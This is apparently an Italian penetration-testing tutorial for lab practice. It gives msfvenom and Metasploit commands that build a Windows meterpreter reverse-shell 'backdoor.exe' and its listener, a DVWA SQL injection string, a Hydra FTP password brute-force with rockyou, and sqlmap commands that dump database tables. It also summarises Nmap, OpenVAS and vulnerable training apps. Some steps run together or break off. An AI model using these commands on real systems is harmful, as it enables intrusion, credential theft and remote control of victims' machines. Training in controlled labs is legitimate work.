Genera un payload per Windows con msfvenom (parte di Metasploit):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<tuo-IP> LPORT=4444 -f exe > backdoor.exe
Avvia un listener su Kali Linux con Metasploit:
msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST <tuo-IP>set LPORT 4444exploit
Scarica un file sospetto (es. da MalwareBazaar, solo per scopi didattici!).
Esegui:
strings <nome-file> | less
Cerca indirizzi IP, URL, comandi sospetti o altre informazioni.
Usa DVWA (Damn Vulnerable Web App) su Metasploitable.
Procedura:
Accedi a DVWA (http://<indirizzo-IP-target>/dvwa) e loggati.
Vai alla sezione "SQL Injection".
Inserisci nel campo di input:
' OR '1'='1
Assicurati di avere un server FTP vulnerabile (es. su Metasploitable).
Crea o scarica una wordlist (es. rockyou.txt su Kali Linux).
Esegui Hydra:
hydra -l <username> -P <percorso-wordlist> ftp://<indirizzo-IP-target>
Se il login ha successo, prova ad accedere manualmente con:
Innanzitutto è sempre utile richiamare due principi di base:
l'esercizio è solo ad uso didattico
deve essere effettuato sempre su una nostra macchina virtuale
Dopo aver avviato la macchina virtuale:
troviamo il suo IP con il comando ip route o se vuoi più dettagli ip addr show
WebGoat è un'applicazione web Java volutamente vulnerabile creata da OWASP, pensata per l'insegnamento della sicurezza delle applicazioni web.
Funzionalità principali
sqlmap è uno strumento open source per rilevare e sfruttare automaticamente vulnerabilità di SQL injection nei database. È pensato per automatizzare il processo di rilevamento e sfruttamento, ed è utilizzato frequentemente nei penetration test web.
Funzionalità principali
Comandi utili
sqlmap -u "http://sito.it/page.php?id=1" --batch
sqlmap -u "http://sito.it/page.php?id=1" --dbs
sqlmap -u "http://sito.it/page.php?id=1" -D nome_db --tables
sqlmap -u "http://sito.it/page.php?id=1" -D nome_db -T nome_tabella --dump
sqlmap -r richiesta.txt --batch
OWASP Juice Shop è una delle applicazioni web più insicure mai realizzate – ed è intenzionale. Serve come piattaforma per la formazione alla sicurezza delle applicazioni web in modo moderno e gamificato.
Funzionalità principali
DVWA è una web application deliberatamente vulnerabile progettata per test di sicurezza ed esercitazioni di ethical hacking. È ideale per imparare e praticare attacchi comuni in un ambiente controllato.
Funzionalità principali:
OpenVAS (Open Vulnerability Assessment Scanner) è il motore di scansione delle vulnerabilità all'interno della suite Greenbone Vulnerability Management (GVM).
Progettato per ambienti professionali, OpenVAS è in grado di eseguire analisi di sicurezza su host, servizi e protocolli, individuando vulnerabilità note tramite un database costantemente aggiornato di NVT (Network Vulnerability Tests).
Tra le sue funzionalità principali:
Supporto a protocolli di rete (SSH, SMB, HTTP/S, SNMP...)
Scansioni complete o mirate, locali e remote
Autenticazione per test avanzati (es. credenziali SSH)
Report in diversi formati con indicatori di severità (CVSS)
Interfaccia web integrata (GSA) per la gestione delle scansioni
OpenVAS è una soluzione potente e flessibile per chi vuole integrare il vulnerability assessment in un'infrastruttura IT, utilizzando esclusivamente software libero.
Nmap (abbreviazione di Network Mapper) è uno strumento open source utilizzato per la scansione e mappatura di reti. Sviluppato inizialmente da Gordon Lyon (conosciuto anche come Fyodor), è uno dei tool fondamentali nell'ambito della sicurezza informatica e del penetration testing.
Scansione delle porte: individua quali porte sono aperte su uno o più host.
Identificazione dei servizi: rileva quali servizi (es. HTTP, SSH, FTP) sono in esecuzione e su quali porte.
Rilevamento del sistema operativo: tenta di determinare il sistema operativo in uso sull’host remoto.
Scansioni personalizzate: supporta svariati tipi di scansione (SYN scan, TCP connect, UDP scan, etc.).
Nmap Scripting Engine (NSE): consente l’uso di script per automatizzare rilevamenti, exploit leggeri e raccolta di informazioni.
nmap 192.168.1.1 → Scansione semplice di un host.
nmap -sS 192.168.1.0/24 → Scansione SYN su una rete.
nmap -A target.com → Scansione avanzata con rilevamento OS e servizi.
nmap --script=vuln target.com → Ricerca di vulnerabilità conosciute con script NSE.
Utile per amministratori di sistema, ethical hacker e professionisti della sicurezza.
Versatile, potente e altamente personalizzabile.
Disponibile su tutte le principali piattaforme (Linux, macOS, Windows).
Un penetration test (o pen test, in italiano test di penetrazione) è una simulazione controllata di un attacco informatico condotta per identificare e valutare le vulnerabilità di un sistema informatico, come server, reti, applicazioni web, dispositivi o intere infrastrutture IT.
